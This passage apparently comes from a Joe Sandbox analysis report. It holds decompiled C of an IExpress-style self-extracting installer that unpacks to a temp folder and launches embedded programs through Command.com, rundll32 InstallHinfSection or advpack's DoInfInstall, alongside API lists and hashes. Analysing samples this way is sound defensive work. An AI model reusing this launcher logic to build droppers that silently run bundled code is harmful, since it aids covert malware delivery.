CharPrevA 3077->3079 3080 10e171e _vsnprintf 3078->3080 3079->3078 3081 10e233f RegSetValueExA 3080->3081 3081->3075 3084 10e1a9a 3083->3084 3086 10e1aba 3084->3086 3088 10e1aaf 3084->3088 3102 10e667f 3084->3102 3086->2982 3087 10e667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 10e2be6 3089->3090 3091 10e2ad4 GetModuleFileNameA 3089->3091 3092 10e6ce0 4 API calls 3090->3092 3101 10e2b02 3091->3101 3094 10e2bf5 3092->3094 3093 10e2af1 IsDBCSLeadByte 3093->3101 3094->3011 3095 10e2bca CharNextA 3097 10e2bd3 CharNextA 3095->3097 3096 10e2b11 CharNextA CharUpperA 3098 10e2b8d CharUpperA 3096->3098 3096->3101 3097->3101 3098->3101 3100 10e2b43 CharPrevA 3100->3101 3101->3090 3101->3093 3101->3095 3101->3096 3101->3097 3101->3100 3107 10e65e8 3101->3107 3103 10e6689 3102->3103 3104 10e66a5 3103->3104 3105 10e6648 IsDBCSLeadByte 3103->3105 3106 10e6697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 10e65f4 3107->3108 3108->3108 3109 10e65fb CharPrevA 3108->3109 3110 10e6611 CharPrevA 3109->3110 3111 10e660b 3110->3111 3113 10e661e 3110->3113 3111->3110 3111->3113 3112 10e663d 3112->3101 3113->3112 3114 10e6627 CharPrevA 3113->3114 3115 10e6634 CharNextA 3113->3115 3114->3112 3114->3115 3115->3112 3117 10e4132 3116->3117 3119 10e412a 3116->3119 3120 10e1ea7 3117->3120 3119->3056 3121 10e1eba 3120->3121 3122 10e1ed3 3120->3122 3123 10e256d 15 API calls 3121->3123 3122->3119 3123->3122 3125 10e2026 3124->3125 3126 10e1ff0 RegOpenKeyExA 3124->3126 3125->2479 3126->3125 3127 10e200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3237 10e6a20 __getmainargs 3238 10e19e0 3239 10e1a24 GetDesktopWindow 3238->3239 3240 10e1a03 3238->3240 3242 10e43d0 11 API calls 3239->3242 3241 10e1a20 3240->3241 3243 10e1a16 EndDialog 3240->3243 3245 10e6ce0 4 API calls 3241->3245 3244 10e1a33 LoadStringA SetDlgItemTextA MessageBeep 3242->3244 3243->3241 3244->3241 3246 10e1a7e 3245->3246 3247 10e7270 _except_handler4_common 3248 10e69b0 3249 10e69b5 3248->3249 3257 10e6fbe 
GetModuleHandleW 3249->3257 3251 10e69c1 __set_app_type __p__fmode __p__commode 3252 10e69f9 3251->3252 3253 10e6a0e 3252->3253 3254 10e6a02 __setusermatherr 3252->3254 3259 10e71ef _controlfp 3253->3259 3254->3253 3256 10e6a13 3258 10e6fcf 3257->3258 3258->3251 3259->3256 3260 10e34f0 3261 10e3504 3260->3261 3262 10e35b8 3260->3262 3261->3262 3263 10e35be GetDesktopWindow 3261->3263 3264 10e351b 3261->3264 3265 10e3526 3262->3265 3269 10e3671 EndDialog 3262->3269 3266 10e43d0 11 API calls 3263->3266 3267 10e354f 3264->3267 3268 10e351f 3264->3268 3270 10e35d6 3266->3270 3267->3265 3272 10e3559 ResetEvent 3267->3272 3268->3265 3271 10e352d TerminateThread EndDialog 3268->3271 3269->3265 3273 10e361d SetWindowTextA CreateThread 3270->3273 3274 10e35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3270->3274 3271->3265 3275 10e44b9 20 API calls 3272->3275 3273->3265 3276 10e3646 3273->3276 3274->3273 3277 10e3581 3275->3277 3278 10e44b9 20 API calls 3276->3278 3279 10e359b SetEvent 3277->3279 3281 10e358a SetEvent 3277->3281 3278->3262 3280 10e3680 4 API calls 3279->3280 3280->3262 3281->3265 3282 10e6ef0 3283 10e6f2d 3282->3283 3285 10e6f02 3282->3285 3284 10e6f27 ?terminate@ 3284->3283 3285->3283 3285->3284

                              Callgraph

                              [Callgraph figure; legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available]

                              Control-flow Graph

                              [Control-flow graph figure for the function at 10e3ba2; legend: Executed, Not Executed]
                              C-Code - Quality: 82%
                              			E010E3BA2() {
                              				signed int _v8;
                              				signed int _v12;
                              				char _v276;
                              				char _v280;
                              				short _v300;
                              				intOrPtr _v304;
                              				void _v348;
                              				char _v352;
                              				intOrPtr _v356;
                              				signed int _v360;
                              				short _v364;
                              				char* _v368;
                              				intOrPtr _v372;
                              				void* _v376;
                              				intOrPtr _v380;
                              				char _v384;
                              				signed int _v388;
                              				intOrPtr _v392;
                              				signed int _v396;
                              				signed int _v400;
                              				signed int _v404;
                              				void* _v408;
                              				void* _v424;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t69;
                              				signed int _t76;
                              				void* _t77;
                              				signed int _t79;
                              				short _t96;
                              				signed int _t97;
                              				intOrPtr _t98;
                              				signed int _t101;
                              				signed int _t104;
                              				signed int _t108;
                              				int _t112;
                              				void* _t115;
                              				signed char _t118;
                              				void* _t125;
                              				signed int _t127;
                              				void* _t128;
                              				struct HINSTANCE__* _t129;
                              				void* _t130;
                              				short _t137;
                              				char* _t140;
                              				signed char _t144;
                              				signed char _t145;
                              				signed int _t149;
                              				void* _t150;
                              				void* _t151;
                              				signed int _t153;
                              				void* _t155;
                              				void* _t156;
                              				signed int _t157;
                              				signed int _t162;
                              				signed int _t164;
                              				void* _t165;
                              
                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                              				_t69 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t69 ^ _t164;
                              				_t153 = 0;
                              				 *0x10e9124 =  *0x10e9124 & 0;
                              				_t149 = 0;
                              				_v388 = 0;
                              				_v384 = 0;
                              				_t165 =  *0x10e8a28 - _t153; // 0x0
                              				if(_t165 != 0) {
                              					L3:
                              					_t127 = 0;
                              					_v392 = 0;
                              					while(1) {
                              						_v400 = _v400 & 0x00000000;
                              						memset( &_v348, 0, 0x44);
                              						_t164 = _t164 + 0xc;
                              						_v348 = 0x44;
                              						if( *0x10e8c42 != 0) {
                              							goto L26;
                              						}
                              						_t146 =  &_v396;
                              						_t115 = E010E468F("SHOWWINDOW",  &_v396, 4);
                              						if(_t115 == 0 || _t115 > 4) {
                              							L25:
                              							_t146 = 0x4b1;
                              							E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              							 *0x10e9124 = 0x80070714;
                              							goto L62;
                              						} else {
                              							if(_v396 != 1) {
                              								__eflags = _v396 - 2;
                              								if(_v396 != 2) {
                              									_t137 = 3;
                              									__eflags = _v396 - _t137;
                              									if(_v396 == _t137) {
                              										_v304 = 1;
                              										_v300 = _t137;
                              									}
                              									goto L14;
                              								}
                              								_push(6);
                              								_v304 = 1;
                              								_pop(0);
                              								goto L11;
                              							} else {
                              								_v304 = 1;
                              								L11:
                              								_v300 = 0;
                              								L14:
                              								if(_t127 != 0) {
                              									L27:
                              									_t155 = 1;
                              									__eflags = _t127 - 1;
                              									if(_t127 != 1) {
                              										L31:
                              										_t132 =  &_v280;
                              										_t76 = E010E1AE8( &_v280,  &_v408,  &_v404); // executed
                              										__eflags = _t76;
                              										if(_t76 == 0) {
                              											L62:
                              											_t77 = 0;
                              											L63:
                              											_pop(_t150);
                              											_pop(_t156);
                              											_pop(_t128);
                              											return E010E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                              										}
                              										_t157 = _v404;
                              										__eflags = _t149;
                              										if(_t149 != 0) {
                              											L37:
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												L57:
                              												_t151 = _v408;
                              												_t146 =  &_v352;
                              												_t130 = _t151; // executed
                              												_t79 = E010E3FEF(_t130,  &_v352); // executed
                              												__eflags = _t79;
                              												if(_t79 == 0) {
                              													L61:
                              													LocalFree(_t151);
                              													goto L62;
                              												}
                              												L58:
                              												LocalFree(_t151);
                              												_t127 = _t127 + 1;
                              												_v396 = _t127;
                              												__eflags = _t127 - 2;
                              												if(_t127 >= 2) {
                              													_t155 = 1;
                              													__eflags = 1;
                              													L69:
                              													__eflags =  *0x10e8580;
                              													if( *0x10e8580 != 0) {
                              														E010E2267();
                              													}
                              													_t77 = _t155;
                              													goto L63;
                              												}
                              												_t153 = _v392;
                              												_t149 = _v388;
                              												continue;
                              											}
                              											L38:
                              											__eflags =  *0x10e8180;
                              											if( *0x10e8180 == 0) {
                              												_t146 = 0x4c7;
                              												E010E44B9(0, 0x4c7, 0, 0, 0x10, 0);
                              												LocalFree(_v424);
                              												 *0x10e9124 = 0x8007042b;
                              												goto L62;
                              											}
                              											__eflags = _t157;
                              											if(_t157 == 0) {
                              												goto L57;
                              											}
                              											__eflags =  *0x10e9a34 & 0x00000004;
                              											if(__eflags == 0) {
                              												goto L57;
                              											}
                              											_t129 = E010E6495(_t127, _t132, _t157, __eflags);
                              											__eflags = _t129;
                              											if(_t129 == 0) {
                              												_t146 = 0x4c8;
                              												E010E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                              												L65:
                              												LocalFree(_v408);
                              												 *0x10e9124 = E010E6285();
                              												goto L62;
                              											}
                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                              											_v404 = _t146;
                              											__eflags = _t146;
                              											if(_t146 == 0) {
                              												_t146 = 0x4c9;
                              												__eflags = 0;
                              												E010E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                              												FreeLibrary(_t129);
                              												goto L65;
                              											}
                              											__eflags =  *0x10e8a30;
                              											_t151 = _v408;
                              											_v384 = 0;
                              											_v368 =  &_v280;
                              											_t96 =  *0x10e9a40; // 0x3
                              											_v364 = _t96;
                              											_t97 =  *0x10e8a38 & 0x0000ffff;
                              											_v380 = 0x10e9154;
                              											_v376 = _t151;
                              											_v372 = 0x10e91e4;
                              											_v360 = _t97;
                              											if( *0x10e8a30 != 0) {
                              												_t97 = _t97 | 0x00010000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t144 =  *0x10e9a34; // 0x1
                              											__eflags = _t144 & 0x00000008;
                              											if((_t144 & 0x00000008) != 0) {
                              												_t97 = _t97 | 0x00020000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t144 & 0x00000010;
                              											if((_t144 & 0x00000010) != 0) {
                              												_t97 = _t97 | 0x00040000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											_t145 =  *0x10e8d48; // 0x0
                              											__eflags = _t145 & 0x00000040;
                              											if((_t145 & 0x00000040) != 0) {
                              												_t97 = _t97 | 0x00080000;
                              												__eflags = _t97;
                              												_v360 = _t97;
                              											}
                              											__eflags = _t145;
                              											if(_t145 < 0) {
                              												_t104 = _t97 | 0x00100000;
                              												__eflags = _t104;
                              												_v360 = _t104;
                              											}
                              											_t98 =  *0x10e9a38; // 0x0
                              											_v356 = _t98;
                              											_t130 = _t146;
                              											 *0x10ea288( &_v384);
                              											_t101 = _v404();
                              											__eflags = _t164 - _t164;
                              											if(_t164 != _t164) {
                              												_t130 = 4;
                              												asm("int 0x29");
                              											}
                              											 *0x10e9124 = _t101;
                              											_push(_t129);
                              											__eflags = _t101;
                              											if(_t101 < 0) {
                              												FreeLibrary();
                              												goto L61;
                              											} else {
                              												FreeLibrary();
                              												_t127 = _v400;
                              												goto L58;
                              											}
                              										}
                              										__eflags =  *0x10e9a40 - 1; // 0x3
                              										if(__eflags == 0) {
                              											goto L37;
                              										}
                              										__eflags =  *0x10e8a20;
                              										if( *0x10e8a20 == 0) {
                              											goto L37;
                              										}
                              										__eflags = _t157;
                              										if(_t157 != 0) {
                              											goto L38;
                              										}
                              										_v388 = 1;
                              										E010E202A(_t146); // executed
                              										goto L37;
                              									}
                              									_t146 =  &_v280;
                              									_t108 = E010E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                              									__eflags = _t108;
                              									if(_t108 == 0) {
                              										goto L25;
                              									}
                              									__eflags =  *0x10e8c42;
                              									if( *0x10e8c42 != 0) {
                              										goto L69;
                              									}
                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                              									__eflags = _t112 == 0;
                              									if(_t112 == 0) {
                              										goto L69;
                              									}
                              									goto L31;
                              								}
                              								_t118 =  *0x10e8a38; // 0x0
                              								if(_t118 == 0) {
                              									L23:
                              									if(_t153 != 0) {
                              										goto L31;
                              									}
                              									_t146 =  &_v276;
                              									if(E010E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                              										goto L27;
                              									}
                              									goto L25;
                              								}
                              								if((_t118 & 0x00000001) == 0) {
                              									__eflags = _t118 & 0x00000002;
                              									if((_t118 & 0x00000002) == 0) {
                              										goto L62;
                              									}
                              									_t140 = "USRQCMD";
                              									L20:
                              									_t146 =  &_v276;
                              									if(E010E468F(_t140,  &_v276, 0x104) == 0) {
                              										goto L25;
                              									}
                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                              										_t153 = 1;
                              										_v388 = 1;
                              									}
                              									goto L23;
                              								}
                              								_t140 = "ADMQCMD";
                              								goto L20;
                              							}
                              						}
                              						L26:
                              						_push(_t130);
                              						_t146 = 0x104;
                              						E010E1781( &_v276, 0x104, _t130, 0x10e8c42);
                              						goto L27;
                              					}
                              				}
                              				_t130 = "REBOOT";
                              				_t125 = E010E468F(_t130, 0x10e9a2c, 4);
                              				if(_t125 == 0 || _t125 > 4) {
                              					goto L25;
                              				} else {
                              					goto L3;
                              				}
                              			}

                              APIs
                              • memset.MSVCRT ref: 010E3C11
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010E3CDC
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010E8C42), ref: 010E3D8F
                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010E3E26
                              • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3EFF
                              • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F1F
                              • FreeLibrary.KERNEL32(00000000,?,010E8C42), ref: 010E3F40
                              • LocalFree.KERNEL32(?,?,?,?,010E8C42), ref: 010E3F47
                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010E8C42), ref: 010E3F76
                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3F80
                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010E8C42), ref: 010E3FC2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                              • API String ID: 1032054927-3356413666
                              • Opcode ID: 676eed3d1fdf1577cdb906ee83409c9c7c81767f6203eaa81ecec233e79721fd
                              • Instruction ID: 00bddd72e0a924ccb5e346a19bdea5302e212816f56494443a6ffa80cb0c6865
                              • Opcode Fuzzy Hash: 676eed3d1fdf1577cdb906ee83409c9c7c81767f6203eaa81ecec233e79721fd
                              • Instruction Fuzzy Hash: FFB19E706083019FE7749F2B9849B6A7EE4BB88B14F00496DFAD5DB290D776C8448B92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E010E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                              				signed int _v8;
                              				char _v268;
                              				char _v527;
                              				char _v528;
                              				char _v1552;
                              				CHAR* _v1556;
                              				int* _v1560;
                              				CHAR** _v1564;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t48;
                              				CHAR* _t53;
                              				CHAR* _t54;
                              				char* _t57;
                              				char* _t58;
                              				CHAR* _t60;
                              				void* _t62;
                              				signed char _t65;
                              				intOrPtr _t76;
                              				intOrPtr _t77;
                              				unsigned int _t85;
                              				CHAR* _t90;
                              				CHAR* _t92;
                              				char _t105;
                              				char _t106;
                              				CHAR** _t111;
                              				CHAR* _t115;
                              				intOrPtr* _t125;
                              				void* _t126;
                              				CHAR* _t132;
                              				CHAR* _t135;
                              				void* _t138;
                              				void* _t139;
                              				void* _t145;
                              				intOrPtr* _t146;
                              				char* _t148;
                              				CHAR* _t151;
                              				void* _t152;
                              				CHAR* _t155;
                              				CHAR* _t156;
                              				void* _t157;
                              				signed int _t158;
                              
                              				_t48 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t48 ^ _t158;
                              				_t108 = __ecx;
                              				_v1564 = _a4;
                              				_v1560 = _a8;
                              				E010E1680( &_v528, 0x104, __ecx);
                              				if(_v528 != 0x22) {
                              					_t135 = " ";
                              					_t53 =  &_v528;
                              				} else {
                              					_t135 = "\"";
                              					_t53 =  &_v527;
                              				}
                              				_t111 =  &_v1556;
                              				_v1556 = _t53;
                              				_t54 = E010E1A84(_t111, _t135);
                              				_t156 = _v1556;
                              				_t151 = _t54;
                              				if(_t156 == 0) {
                              					L12:
                              					_push(_t111);
                              					E010E1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              					E010E658A( &_v268, 0x104, _t156);
                              					goto L13;
                              				} else {
                              					_t132 = _t156;
                              					_t148 =  &(_t132[1]);
                              					do {
                              						_t105 =  *_t132;
                              						_t132 =  &(_t132[1]);
                              					} while (_t105 != 0);
                              					_t111 = _t132 - _t148;
                              					if(_t111 < 3) {
                              						goto L12;
                              					}
                              					_t106 = _t156[1];
                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                              							goto L12;
                              						} else {
                              							goto L11;
                              						}
                              					} else {
                              						L11:
                              						E010E1680( &_v268, 0x104, _t156);
                              						L13:
                              						_t138 = 0x2e;
                              						_t57 = E010E66C8(_t156, _t138);
                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                              							_t139 = 0x2e;
                              							_t115 = _t156;
                              							_t58 = E010E66C8(_t115, _t139);
                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                              								_t156 = LocalAlloc(0x40, 0x400);
                              								if(_t156 == 0) {
                              									goto L43;
                              								}
                              								_t65 = GetFileAttributesA( &_v268); // executed
                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                              									E010E1680( &_v1552, 0x400, _t108);
                              								} else {
                              									_push(_t115);
                              									_t108 = 0x400;
                              									E010E1781( &_v1552, 0x400, _t115,  &_v268);
                              									if(_t151 != 0 &&  *_t151 != 0) {
                              										E010E16B3( &_v1552, 0x400, " ");
                              										E010E16B3( &_v1552, 0x400, _t151);
                              									}
                              								}
                              								_t140 = _t156;
                              								 *_t156 = 0;
                              								E010E2AAC( &_v1552, _t156, _t156);
                              								goto L53;
                              							} else {
                              								_t108 = "Command.com /c %s";
                              								_t125 = "Command.com /c %s";
                              								_t145 = _t125 + 1;
                              								do {
                              									_t76 =  *_t125;
                              									_t125 = _t125 + 1;
                              								} while (_t76 != 0);
                              								_t126 = _t125 - _t145;
                              								_t146 =  &_v268;
                              								_t157 = _t146 + 1;
                              								do {
                              									_t77 =  *_t146;
                              									_t146 = _t146 + 1;
                              								} while (_t77 != 0);
                              								_t140 = _t146 - _t157;
                              								_t154 = _t126 + 8 + _t146 - _t157;
                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                              								if(_t156 != 0) {
                              									E010E171E(_t156, _t154, "Command.com /c %s",  &_v268);
                              									goto L53;
                              								}
                              								goto L43;
                              							}
                              						} else {
                              							_t85 = GetFileAttributesA( &_v268);
                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                              								_t140 = 0x525;
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_t60 =  &_v268;
                              								goto L35;
                              							} else {
                              								_t140 = "[";
                              								_v1556 = _t151;
                              								_t90 = E010E1A84( &_v1556, "[");
                              								if(_t90 != 0) {
                              									if( *_t90 != 0) {
                              										_v1556 = _t90;
                              									}
                              									_t140 = "]";
                              									E010E1A84( &_v1556, "]");
                              								}
                              								_t156 = LocalAlloc(0x40, 0x200);
                              								if(_t156 == 0) {
                              									L43:
                              									_t60 = 0;
                              									_t140 = 0x4b5;
                              									_push(0);
                              									_push(0x10);
                              									_push(0);
                              									L35:
                              									_push(_t60);
                              									E010E44B9(0, _t140);
                              									_t62 = 0;
                              									goto L54;
                              								} else {
                              									_t155 = _v1556;
                              									_t92 = _t155;
                              									if( *_t155 == 0) {
                              										_t92 = "DefaultInstall";
                              									}
                              									 *0x10e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                              									 *_v1560 = 1;
                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10e1140, _t156, 8,  &_v268) == 0) {
                              										 *0x10e9a34 =  *0x10e9a34 & 0xfffffffb;
                              										if( *0x10e9a40 != 0) {
                              											_t108 = "setupapi.dll";
                              										} else {
                              											_t108 = "setupx.dll";
                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                              										}
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										_push( &_v268);
                              										_push(_t155);
                              										E010E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                              									} else {
                              										 *0x10e9a34 =  *0x10e9a34 | 0x00000004;
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										E010E1680(_t108, 0x104, _t155);
                              										_t140 = 0x200;
                              										E010E1680(_t156, 0x200,  &_v268);
                              									}
                              									L53:
                              									_t62 = 1;
                              									 *_v1564 = _t156;
                              									L54:
                              									_pop(_t152);
                              									return E010E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                              								}
                              							}
                              						}
                              					}
                              				}
                              			}

                              APIs
                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BE7
                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BFE
                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010E1C57
                              • GetPrivateProfileIntA.KERNEL32 ref: 010E1C88
                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010E1140,00000000,00000008,?), ref: 010E1CB8
                              • GetShortPathNameA.KERNEL32 ref: 010E1D1B
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                              • API String ID: 383838535-2280873615
                              • Opcode ID: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                              • Instruction ID: 654b32289aa80ccd444a7e66062c3992cce5bb03941d03d4b986cd8a240a810c
                              • Opcode Fuzzy Hash: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                              • Instruction Fuzzy Hash: F1A16A70A042085FEF60AB2ACC4CBEA77E9EB95710F1442D9E5D5A72C0DBB18E85CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Figure: control-flow graph of function 010E597D; legend: executed / not executed blocks]
                              C-Code - Quality: 96%
                              			E010E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                              				signed int _v8;
                              				char _v16;
                              				char _v276;
                              				char _v788;
                              				long _v792;
                              				long _v796;
                              				long _v800;
                              				signed int _v804;
                              				long _v808;
                              				int _v812;
                              				long _v816;
                              				long _v820;
                              				void* __ebx;
                              				void* __esi;
                              				signed int _t46;
                              				int _t50;
                              				signed int _t55;
                              				void* _t66;
                              				int _t69;
                              				signed int _t73;
                              				signed short _t78;
                              				signed int _t87;
                              				signed int _t101;
                              				int _t102;
                              				unsigned int _t103;
                              				unsigned int _t105;
                              				signed int _t111;
                              				long _t112;
                              				signed int _t116;
                              				CHAR* _t118;
                              				signed int _t119;
                              				signed int _t120;
                              
                              				_t114 = __edi;
                              				_t46 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t46 ^ _t120;
                              				_v804 = __edx;
                              				_t118 = __ecx;
                              				GetCurrentDirectoryA(0x104,  &_v276);
                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                              				if(_t50 != 0) {
                              					_push(__edi);
                              					_v796 = 0;
                              					_v792 = 0;
                              					_v800 = 0;
                              					_v808 = 0;
                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                              					__eflags = _t55;
                              					if(_t55 == 0) {
                              						L29:
                              						memset( &_v788, 0, 0x200);
                              						 *0x10e9124 = E010E6285();
                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              						_t110 = 0x4b0;
                              						L30:
                              						__eflags = 0;
                              						E010E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                              						SetCurrentDirectoryA( &_v276);
                              						L31:
                              						_t66 = 0;
                              						__eflags = 0;
                              						L32:
                              						_pop(_t114);
                              						goto L33;
                              					}
                              					_t69 = _v792 * _v796;
                              					_v812 = _t69;
                              					_t116 = MulDiv(_t69, _v800, 0x400);
                              					__eflags = _t116;
                              					if(_t116 == 0) {
                              						goto L29;
                              					}
                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                              					__eflags = _t73;
                              					if(_t73 != 0) {
                              						SetCurrentDirectoryA( &_v276); // executed
                              						_t101 =  &_v16;
                              						_t111 = 6;
                              						_t119 = _t118 - _t101;
                              						__eflags = _t119;
                              						while(1) {
                              							_t22 = _t111 - 4; // 0x2
                              							__eflags = _t22;
                              							if(_t22 == 0) {
                              								break;
                              							}
                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                              							__eflags = _t87;
                              							if(_t87 == 0) {
                              								break;
                              							}
                              							 *_t101 = _t87;
                              							_t101 = _t101 + 1;
                              							_t111 = _t111 - 1;
                              							__eflags = _t111;
                              							if(_t111 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t111;
                              						if(_t111 == 0) {
                              							_t101 = _t101 - 1;
                              							__eflags = _t101;
                              						}
                              						 *_t101 = 0;
                              						_t112 = 0x200;
                              						_t102 = _v812;
                              						_t78 = 0;
                              						_t118 = 8;
                              						while(1) {
                              							__eflags = _t102 - _t112;
                              							if(_t102 == _t112) {
                              								break;
                              							}
                              							_t112 = _t112 + _t112;
                              							_t78 = _t78 + 1;
                              							__eflags = _t78 - _t118;
                              							if(_t78 < _t118) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t78 - _t118;
                              						if(_t78 != _t118) {
                              							__eflags =  *0x10e9a34 & 0x00000008;
